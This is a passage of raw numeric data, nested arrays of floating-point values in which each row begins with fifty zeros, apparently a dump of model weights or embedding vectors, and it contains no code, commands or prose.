-0.1598, -0.4377, -0.657, 0.3809, -0.75, -1.653, 0.7456, 0.08154], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.6094, -0.1779, -0.03326, -0.1672, 0.1416, -0.396, -2.176, -1.069, -0.6577, -0.3347, 0.341, 0.2834, -0.01735, -0.03995, -1.094, -0.04706, 0.566, -2.78, -0.3613, -0.00363, 0.1675, 0.4365, -0.1926, 0.01848, 0.03583, 0.4338, 0.03207, 0.3457, -0.1918, 0.506, 0.58, 0.0699, -0.685, -1.133, 0.10455, 0.2433, -0.0986, -0.01128, -0.4663, 0.3594, 0.2151, -0.03406, -0.0634, -0.2065, -0.014435, 0.5273, 0.5146, -0.04135, 0.3887, 0.3435], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0657, 0.429, 0.02196, 0.1827, -0.648, -0.237, -1.117, -0.3389, -0.4438, 0.724, -1.848, -1.192, 0.2008, 0.451, -0.1766, -0.00829, -1.668, -0.3035, 0.09973, -0.6694, -1.142, -0.166, -0.0786, 0.004467, 0.02026, 0.676, 0.05112, -0.0744, 0.6855, -0.0736, 0.01846, -0.437, 0.4282, 0.2046, -0.6763, -0.1242, 1.878, 0.2886, -0.07367, 0.771, 0.338, 0.5923, -0.0406, 0.0772, 0.3364, 0.5737, 1.036, -0.2292, -0.703, 0.004997], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04144, 0.003685, -0.01927, -0.03452, -0.013985, -0.005554, -0.03098, 0.0002613, 0.01071, -0.05045, -0.0494, 0.03177, -0.02634, -0.03065, 0.005375, 0.01726, -0.0419, -0.0018215, 0.01906, -0.05563, -0.05087, -0.04395, -0.05594, 0.03888, -0.04785, -0.02197, 0.0003908, -0.0349, -0.03067, 0.0357, 0.02255, -0.03072, 0.01279, 0.000891, 0.02417, 0.02759, 0.0275, -0.01313, -0.02939, 0.02611, -0.0606, -0.05066, 0.01437, 0.02382, -0.02972, 0.002035, 0.03406, -0.02928, -0.01797, -0.04834], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01134, 0.605, 0.00252, -0.2717, -0.1914, -0.2932, 0.1532, 0.36, 0.2825, -0.3232, 0.528, -0.656, -0.493, 0.8076, 0.1575, 0.002096, 0.6265, 0.1707, -0.05377, 0.863, 0.2944, 0.0655, -0.2041, -0.00334, -0.01094, 0.2803, -0.518, 0.02582, 0.1809, 0.7407, -0.00677, 0.2908, -0.8354, -0.02005, -1.382, -0.1659, 0.00235, 0.2252, 0.02818, 0.88, 0.08673, 0.5815, 0.245, 0.0863, 0.0458, -0.1605, -0.961, -1.85, 0.0731, 0.02826], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3687, 0.2632, 0.1409, -0.328, -0.0368, -0.1164, 0.0613, 0.1356, 0.8486, 0.0588, -1.105, 0.3943, 0.06174, 0.4714, -0.743, 0.03632, -1.375, -0.2542, -0.25, -0.4272, -0.0749, 2.094, -0.4126, 0.02068, -0.02003, -2.709, 0.3735, 0.05997, -0.642, -0.1765, 0.1877, -0.0862, 0.4111, -0.01653, -6.515e-05, -0.0664, 1.175, -0.512, 0.1354, 0.1853, -0.0777, -1.496, 0.7217, -0.0702, -0.2756, -0.1611, 1.619, 0.4854, -0.05194, 0.0976], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3196, 1.551, 0.2294, -1.208, 0.02063, 0.0808, 0.1181, -0.8105, 0.02504, -0.2155, 1.195, 0.4998, -0.838, -0.285, -0.005615, -0.009926, 0.7085, 0.8135, 0.966, 0.5493, -0.4688, 0.2202, 0.11115, 0.012146, -0.03412, -0.0816, -0.1628, -0.2708, 0.5815, -0.1214, 0.2074, -0.4048, 0.7593, 0.2737, -0.936, 0.04614, -0.589, -0.1586, -0.01651, 0.8105, -0.00963, 2.11, -1.09, 0.3972, -0.2722, -3.312, -0.01965, 0.7017, -0.1102, -0.2457], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1226, 0.3945, -0.3142, -0.0062, 0.7114, -0.08234, -0.4824, -2.49, -0.8706, 0.01813, -1.107, -0.5264, -0.2429, 0.518, 0.0558, 0.04547, 0.0856, -1.486, 0.3433, -0.537, -0.6445, 0.1465, -0.02432, -0.0463, 0.03226, -1.62, 0.138, 1.601, -1.523, 0.3928, 0.2512, 0.58, 1.202, -1.212, -1.267, -2.393, 2.027, 0.1153, -0.1997, 1.129, 0.2979, -0.5977, -1.304, -0.9204, 0.5913, -2.56, -1.346, 1.326, 0.212, -0.1423], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01563, 0.01685, -0.02309, -0.05792, -0.05606, -0.04092, -0.01269, -0.03577, 0.03665, 0.01067, 0.03595, -0.011215, -0.0188, -0.00436, -0.0289, -0.01595, 0.02904, 0.03986, -0.04312, 0.03925, -0.01221, 0.03464, -0.02045, -0.02812, 0.00718, -0.0311, -0.02507, 0.0155, -0.00733, 0.01358, 0.02109, 0.03342, -0.004726, -0.02402, -0.02654, 0.009346, 0.01106, -0.0485, -0.0139, 0.0008955, -0.0292, -0.04578, -0.02177, 0.0192, -0.00605, 0.0214, -0.048, -0.003458, -0.001835, 0.009544], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.304, 0.6265, 0.0553, -0.2683, 0.1517, 0.1646, 0.876, 0.8193, 0.5405, 0.339, -0.496, 0.3523, 0.08575, -1.522, -0.5713, 0.03023, -1.307, 0.893, -0.587, -1.183, -0.2019, 1.355, 0.2544, -0.007416, -0.01435, 0.4915, 0.3218, 0.2668, 0.641, 0.04272, 0.133, -0.1862, -0.1284, -0.04828, 0.03867, 1.13, -0.2457, 0.2556, -0.1533, -0.309, 0.3845, 0.529, -0.136, -0.1492, -0.4795, -0.1357, 1.157, 0.745, 0.667, -0.4006], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.113, -0.192, -0.04865, -0.4143, -1.096, 0.875, -0.9624, 1.057, 0.2164, -1.6455, 0.6255, 0.05405, -2.299, -0.1417, -1.067, -0.02687, -0.152, 0.1879, 0.2133, 0.0732, -0.1486, -0.3628, -0.3762, -0.004604, -0.0075, -2.947, 1.047, 0.1162, 1.827, -0.65, -0.4883, -0.4932, -1.688, -0.3452, 1.753, 0.685, -1.411, 0.8433, -0.0378, -0.631, -0.298, 0.2996, 0.4766, -0.4114, -1.43, 0.266, -3.338, -2.607, -0.567, 0.809], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.925, -1.694, -0.02568, -1.615, -0.1388, 0.527, -0.06274, 0.03192, -0.583, 0.4795, -1.334, -0.686, -1.244, 0.5923, -0.6562, 0.01811, -0.8794, 1.585, -0.2686, -0.6484, -0.2483, 0.002077, 0.175, 0.0394, -0.03137, 0.459, 0.004578, -0.316, 1.232, 0.0672, 0.1439, 0.5317, -0.3, -0.03174, -1.776, -0.1787, 1.788, 0.1832, 0.0837, -0.5093, 0.137, -0.493, -0.2327, -0.0971, -0.11127, 1.215, 1.037, 0.532, 1.465, 0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.863, -0.67, -1.38, -0.10986, 0.0747, 0.72, -0.03256, -0.1451, -0.351, -0.1941, 0.693, -0.7954, 0.3403, -0.4358, 0.1248, 0.03772, -0.926, -0.0452, 0.1511, 0.11707, 0.06235, 0.475, -0.1959, 0.02454, -0.02675, -0.2352, 0.10175, 0.4875, 0.05685, 0.949, -0.9966, -1.039, 1.205, 0.0508, 0.01443, -0.8745, -0.1326, 0.09607, -2.873, -1.791, 0.0883, 0.0465, -0.043, 0.5703, 0.682, 0.305, -1.174, -0.1422, 0.0451, 0.541], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.001486, -0.00357, -0.0617, -0.06366, 0.02477, -0.03049, -0.0441, 0.00903, -0.02225, 0.01127, -0.02292, -0.0373, -0.005047, -0.02795, 0.01738, 0.03937, 0.011604, -0.04376, -0.0403, -0.0562, 0.02988, 0.004307, 0.02577, 0.01461, -0.01866, 0.02591, 0.012436, 0.03038, -0.02292, -0.04602, 0.02731, -0.05273, 0.03885, -0.005363, -0.01098, -0.0371, -0.002846, -0.06635, -0.0454, -0.0462, -0.003315, -0.03653, 0.02913, -0.02469, -0.02771, 0.005486, -0.0177, 0.0259, -0.04138, 0.01214], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.785, -0.05972, -0.0007668, 0.9214, -0.7095, 0.3804, 0.1943, 0.00413, -2.654, 0.669, -0.2715, -0.1453, 0.297, 0.9487, -1.819, 0.04205, -0.9775, -0.07526, -0.3257, -0.414, -1.113, -0.3691, -0.06415, 0.04504, 0.0367, -0.0664, 0.674, -0.11, 1.514, -0.99, 0.5464, 0.2102, 0.0236, 0.808, -1.51, 0.298, -1.763, 0.1247, -0.8228, -0.1355, 0.0584, -2.557, -0.1676, 0.3042, 1.111, -5.613, 0.3152, -0.0748, -0.604, 1.017], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.01875, -0.03333, -0.03815, 0.0162, -0.03625, -0.03326, 0.001578, 0.01334, -0.01927, 0.01371, 0.04242, -0.01299, -0.0547, -0.02077, -0.02922, -0.0309, 0.01335, -0.03348, 0.007504, 0.00401, -0.001606, -0.03973, -0.0435, 0.01009, -0.01013, 0.0002166, -0.0441, -0.04587, 0.02405, -0.007572, -0.02036, 0.01461, 0.003674, -0.02986, 0.02246, -0.004707, -0.02449, -0.04553, -0.012535, -0.001576, -0.03198, -0.01807, -0.006332, 0.005836, 0.03114, -0.000496, -0.04407, 0.0437, 0.01429, 0.02612], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.953, -1.719, -1.84, -0.01863, -0.01089, 0.1178, 0.0828, -0.837, -0.09015, -0.148, 0.5254, -0.686, -0.678, 0.3066, -0.3477, -0.00514, 0.8228, -0.3413, 0.8877, -0.732, -0.03047, -1.104, 0.3638, -0.029, 0.00714, 0.168, 0.2961, -0.2917, -0.5913, -0.06274, -0.4946, 0.09467, 1.504, 0.534, -0.02623, 0.0914, -0.1312, 0.4617, -1.271, -1.409, 0.2263, 0.8325, 0.586, -1.192, -0.1592, -0.2776, 0.10205, -0.1337, -0.03232, 0.497], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -4.254, 2.078, -0.03293, -0.3196, 0.399, 0.03906, -1.108, -0.4438, -0.06104, 0.1488, -0.9595, -0.3735, -0.3066, -0.1342, 0.585, -0.0453, 0.06195, 0.5586, 0.08905, -0.1126, 0.618, -0.92, -0.2349, 0.012985, 0.0112, -0.0011835, -0.6494, 2.717, -0.519, -0.8057, 0.421, 0.2524, 0.765, -1.199, 1.057, -1.713, -0.1779, 0.2808, -0.2927, -0.945, -0.0642, -0.802, -1.0625, 0.0773, 0.2346, 0.996, -0.2822, 2.297, -2.062, -0.3694], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5825, 0.833, -0.6284, -0.1035, -0.0001231, 0.3162, -0.261, 0.0305, 0.2129, 0.1835, -0.3071, -0.2908, -0.11554, -0.1853, -0.09894, 0.03964, 0.1318, 0.1987, -0.1964, 0.09955, -0.2913, 1.179, 0.1343, 0.0483, 0.0367, 0.2056, 0.3684, 1.213, -0.1854, 0.1781, 0.1859, 0.05905, -0.0999, -0.211, 0.2157, 0.3318, -0.1664, -0.02866, -0.02611, 0.256, 0.184, -0.353, 1.117, -0.0612, -0.02525, 0.3425, 0.12463, -0.2495, 0.322, 0.8223], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1368, 0.07214, -0.2593, -0.02083, -0.1506, -0.08954, 0.02457, -0.03415, -0.1222, -0.06384, -0.02823, -0.1995, -0.06665, 0.03293, -0.09796, 0.04767, 0.0698, -0.0435, 0.04752, -0.1053, 0.00866, 0.05075, 0.03177, 0.04562, -0.03555, 0.02657, 0.07904, 0.03723, 0.09985, 0.04706, 0.02017, -0.04822, 0.0617, -0.03014, 0.04718, 0.0881, -0.06274, -0.05142, -0.01154, -0.01721, -0.02977, 0.0545, 0.02156, 0.08966, 0.003513, 0.1199, -0.0481, -0.0746, 0.0317, 0.004375], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5825, -0.1108, 0.2157, -0.0994, 0.2915, 0.792, -2.645, 0.1333, 0.03452, -0.547, -1.589, -0.5884, 0.1335, -1.365, 0.04483, 0.004322, 1.961, -0.3416, 0.904, -1.372, 0.2158, -2.438, -0.3845, 0.01854, -0.04538, 0.915, -0.5513, 0.4185, 0.4678, 0.1987, -0.6084, 0.3826, -0.3782, 0.6655, -0.05237, 0.04913, 0.2231, -0.4106, 0.901, 0.873, -0.2308, 0.964, -0.063, 0.238, 0.05298, 0.425, -0.2517, -1.06, -2.006, 0.541], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.786, -0.2717, -0.4053, 0.1599, -0.843, 0.3374, 0.1118, -0.015175, -0.1387, 0.4229, -0.307, 0.0784, -0.3936, 0.2072, 0.2113, 0.003408, -0.4688, 0.1233, -0.06012, 0.6885, -0.2666, 0.1852, 0.07043, -0.01828, -0.02013, 0.5513, -0.6504, -0.6284, 0.7583, -0.636, -0.6084, -0.01637, -0.24, 1.079, -0.5464, 0.4485, 0.377, 0.6553, 0.1743, -0.3542, -0.2323, 0.1164, -0.333, -0.5786, 0.2091, -0.578, 0.452, 0.9316, 0.10895, 0.0912], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.658, -0.7764, -0.01383, -0.1838, 0.5635, 0.2488, 0.656, 0.7197, 0.1943, -0.1198, -0.1434, 0.2318, 0.2485, -0.599, 0.1826, -0.01331, -0.1033, -0.1604, 0.262, -0.588, 0.2573, -0.7163, -0.2277, -0.00741, 0.03928, 0.502, -0.2462, -0.63, -0.000498, -0.2272, -0.3867, 0.04337, 0.4956, 0.724, -0.555, 0.3657, 0.6436, -0.06113, 0.1641, 0.2554, -0.2246, -0.0591, -0.3018, -0.62, 0.2072, -0.01122, 0.328, 1.045, -0.2566, 0.5938], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.334, 0.4045, -0.4617, 0.02164, 0.02248, 0.58, 0.01627, 0.1305, -0.3367, 0.08984, 0.7896, 0.8027, -0.04852, -0.497, -0.1321, -0.0006585, 0.39, -0.10474, -0.1454, -0.1786, 0.4788, -0.01599, 0.2013, -0.0382, -0.005116, 0.3762, 0.2297, 0.32, -0.2603, -0.1142, -0.06726, -0.2402, -0.6997, 0.629, -0.3806, 0.11005, -0.5596, 0.677, 1.255, -0.372, -0.634, 0.4136, 0.229, 0.747, -0.2125, -0.782, 0.0701, 0.718, -0.05374, 0.2783], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3586, -0.2085, -0.2588, 0.1113, 0.05963, -0.4543, 0.1825, -0.8228, -0.686, 0.7446, -2.176, -0.4182, -0.1224, 1.375, 0.4858, 0.005505, -0.4426, 0.1914, 0.1243, -0.2168, -0.813, 0.814, -0.09265, 0.02948, -0.02348, 0.851, -0.3105, 0.7993, -1.182, -0.00795, 0.0995, 0.9517, -0.2668, -0.2812, -0.384, 0.0802, 1.533, 0.3196, 0.07117, 0.851, 0.634, -1.071, 0.249, -0.1906, 0.4866, 0.4355, 2.387, 1.612, 0.342, 0.06573], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.949, 0.696, -0.516, -0.1907, 0.733, -2.002, -0.5415, -0.4348, 0.3865, 0.2559, 2.273, -0.9023, -0.6313, 1.411, -0.5796, 0.01117, -0.152, 0.3027, -0.7256, 0.2185, 0.4944, -0.379, 0.34, -0.04834, 0.04285, -1.358, -0.6084, 0.1228, 0.4243, 0.526, 0.564, 0.651, -0.417, -0.287, 1.302, -3.072, -0.7134, -0.97, -0.01788, 0.472, -0.04163, -0.831, -0.8364, -1.105, -0.3835, -1.391, -2.809, -1.937, 0.8516, -0.1661], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.516, 0.5513, 0.9297, -0.414, 0.4526, 0.8965, -0.653, 0.832, 0.827, 0.2208, 0.4646, 0.4014, 0.2408, -0.2795, -0.2673, -0.006413, 0.9385, 0.4155, 0.057, 0.0867, 0.9976, -0.625, -0.5166, -0.04938, 0.001881, 1.315, -0.2212, -1.735, 0.4497, -0.0669, -0.0354, 0.5864, 0.0387, 0.2666, 0.1898, -0.012634, -0.8545, 1.089, 0.1636, -0.1342, -0.12195, 0.3354, 0.6284, 0.01292, -0.296, 0.11597, 0.4617, 2.11, 0.05, 0.3271], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2306, -0.008194, -0.06854, 0.0448, -0.224, -0.5425, 0.2186, 0.252, -0.1404, 0.08606, 0.1736, -0.539, -0.01709, -0.0257, -0.2152, -0.03287, -0.2239, 0.0865, 0.1676, -0.3557, 0.1047, -0.006744, 0.01883, 0.008934, 0.006645, 0.2257, -0.157, 0.0089, -0.2153, 0.113, 0.395, 0.359, -0.1321, -0.33, -0.1547, -0.02243, -0.1509, -0.09485, 0.1628, -0.00301, -0.1484, -0.0701, 0.376, 0.3164, -0.02393, 0.1213, -0.3313, -0.2098, 0.03455, 0.2559], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.547, 0.1263, 0.3342, 0.718, 0.0883, 0.991, 0.1486, 0.413, -3.19, -0.7563, 0.495, -0.4333, -0.726, 0.209, 0.0277, -0.000543, -0.2844, -0.8467, 0.6816, -0.4634, -0.3472, 0.1339, -0.01374, 0.02148, 0.02313, 0.516, -0.2957, -0.084, -0.3306, -0.10815, -0.00787, 0.177, 2.264, 0.4102, 